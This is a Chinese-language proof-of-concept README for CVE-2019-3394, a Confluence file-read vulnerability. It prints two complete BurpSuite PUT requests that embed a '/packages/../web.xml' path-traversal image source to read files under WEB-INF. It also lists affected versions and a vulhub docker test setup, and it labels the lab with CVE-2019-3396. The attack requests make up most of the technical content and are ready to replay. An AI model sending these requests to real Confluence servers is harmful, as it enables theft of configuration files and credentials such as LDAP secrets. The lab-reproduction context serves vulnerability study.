└── README.md


/README.md:
--------------------------------------------------------------------------------
  1 | # CVE-2019-3394
  2 | Confluence（install-directory>/confluence/WEB-INF/）文件读取漏洞
  3 | 
  4 | 
  5 | ## BurpSuite Request
  6 | 
  7 | #### vuln_url http://10.10.20.166:8090/rest/api/content/65610?status=draft
  8 | ```
  9 | PUT /rest/api/content/65610?status=draft HTTP/1.1
 10 | Host: 10.10.20.166:8090
 11 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
 12 | Accept: application/json, text/javascript, */*; q=0.01
 13 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 14 | Accept-Encoding: gzip, deflate
 15 | Content-Type: application/json; charset=utf-8
 16 | X-Requested-With: XMLHttpRequest
 17 | Referer: http://10.10.20.166:8090/pages/resumedraft.action?draftId=65610&draftShareId=58f4ea64-a2bd-473d-93ce-157cf3c229f3
 18 | Content-Length: 490
 19 | Cookie: JSESSIONID=FFD0CA6A6268E12E69A566AAD965B17A
 20 | X-Forwarded-For: 127.0.0.1
 21 | Connection: close
 22 | 
 23 | {"status":"current","title":"test","space":{"key":"JAS"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image confluence-external-resource\" style=\"max-height: 250px;\" src=\"http://10.10.20.166:8090/packages/../web.xml\" data-image-src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65610"}}},"id":"65610","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.mlIer8AOrlZcj7dg7IWDwUc.5"},"ancestors":[{"id":"65586","type":"page"}]}
 24 | ```
 25 | #### change
 26 | 
 27 | `src=\"http://10.10.20.166:8090/packages/../web.xml\"`
 28 | 
 29 | to
 30 | 
 31 | `src=\"/packages/../web.xml\"`
 32 | 
 33 | ```
 34 | PUT /rest/api/content/65610?status=draft HTTP/1.1
 35 | Host: 10.10.20.166:8090
 36 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
 37 | Accept: application/json, text/javascript, */*; q=0.01
 38 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 39 | Accept-Encoding: gzip, deflate
 40 | Content-Type: application/json; charset=utf-8
 41 | X-Requested-With: XMLHttpRequest
 42 | Referer: http://10.10.20.166:8090/pages/resumedraft.action?draftId=65610&draftShareId=58f4ea64-a2bd-473d-93ce-157cf3c229f3
 43 | Content-Length: 490
 44 | Cookie: JSESSIONID=FFD0CA6A6268E12E69A566AAD965B17A
 45 | X-Forwarded-For: 127.0.0.1
 46 | Connection: close
 47 | 
 48 | {"status":"current","title":"test","space":{"key":"JAS"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image confluence-external-resource\" style=\"max-height: 250px;\" src=\"/packages/../web.xml\" data-image-src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65610"}}},"id":"65610","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.mlIer8AOrlZcj7dg7IWDwUc.5"},"ancestors":[{"id":"65586","type":"page"}]}
 49 | ```
 50 | 
 51 | ## 0x00 简介
 52 | 
 53 | Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞：具有“添加页面”空间权限的远程攻击者，能够读取 <install-directory>/confluence/WEB-INF/ 目录下的任意文件。
 54 | 该目录可能包含用于与其他服务集成的配置文件，可能会泄漏认证凭据，例如 LDAP 认证凭据或其他敏感信息。
 55 |   
 56 |   
 57 | ### 漏洞影响版本：
 58 | 6.1.0 <= version < 6.6.16
 59 | 6.7.0 <= version < 6.13.7
 60 | 6.14.0 <= version < 6.15.8
 61 |   
 62 | ## 0x01 CVE-2019-3394漏洞复现过程
 63 |  
 64 | ### 测试环境： Atlassian Confluence 6.10.2
 65 |  
 66 | `root@kali:~/vulhub/confluence/CVE-2019-3396# docker-compose up -d`
 67 | 
 68 | ```
 69 |   root@kali:~/vulhub/confluence/CVE-2019-3396# docker-compose up -d
 70 | cve-2019-3396_db_1 is up-to-date
 71 | cve-2019-3396_web_1 is up-to-date
 72 | root@kali:~/vulhub/confluence/CVE-2019-3396# docker ps -a
 73 | CONTAINER ID        IMAGE                              COMMAND                  CREATED             STATUS              PORTS                                            NAMES
 74 | ab287d68d994        vulhub/confluence:6.10.2           "/docker-entrypoint.…"   2 hours ago         Up 2 hours          0.0.0.0:8090->8090/tcp, 8091/tcp                 cve-2019-3396_web_1
 75 | 1f58f73d5349        postgres:10.7-alpine               "docker-entrypoint.s…"   2 hours ago         Up 2 hours          5432/tcp                                         cve-2019-3396_db_1
 76 | 
 77 |  ```
 78 |  
 79 |  `/opt/atlassian/confluence/confluence/WEB-INF`
 80 |  
 81 |  目录下的文件
 82 |  
 83 |  ```
 84 |  ./admin/longrunningtask-xml.vm
 85 | ./WEB-INF/glue-config.xml
 86 | ./WEB-INF/urlrewrite.xml
 87 | ./WEB-INF/web.xml
 88 | ./WEB-INF/decorators.xml
 89 | ./WEB-INF/sitemesh.xml
 90 | ./WEB-INF/lib/batik-xml-1.9.jar
 91 | ./WEB-INF/lib/xml-apis-ext-1.3.04.jar
 92 | ./WEB-INF/lib/atlassian-secure-xml-3.2.11.jar
 93 | ./WEB-INF/lib/xmlrpc-supplementary-character-support-0.2.jar
 94 | ./WEB-INF/lib/xmlgraphics-commons-2.2.jar
 95 | ./WEB-INF/lib/xmlrpc-2.0+xmlrpc61.1+sbfix.jar
 96 | ./WEB-INF/classes/seraph-config.xml
 97 | ./WEB-INF/classes/seraph-paths.xml
 98 | ./importexport/includes/export-xml.vm
 99 | ./search/osd.xml
100 | ./META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
101 | ```
102 | 
103 | 
104 | ## 参考链接：
105 | 
106 | https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2019-3396/README.md
107 | 


--------------------------------------------------------------------------------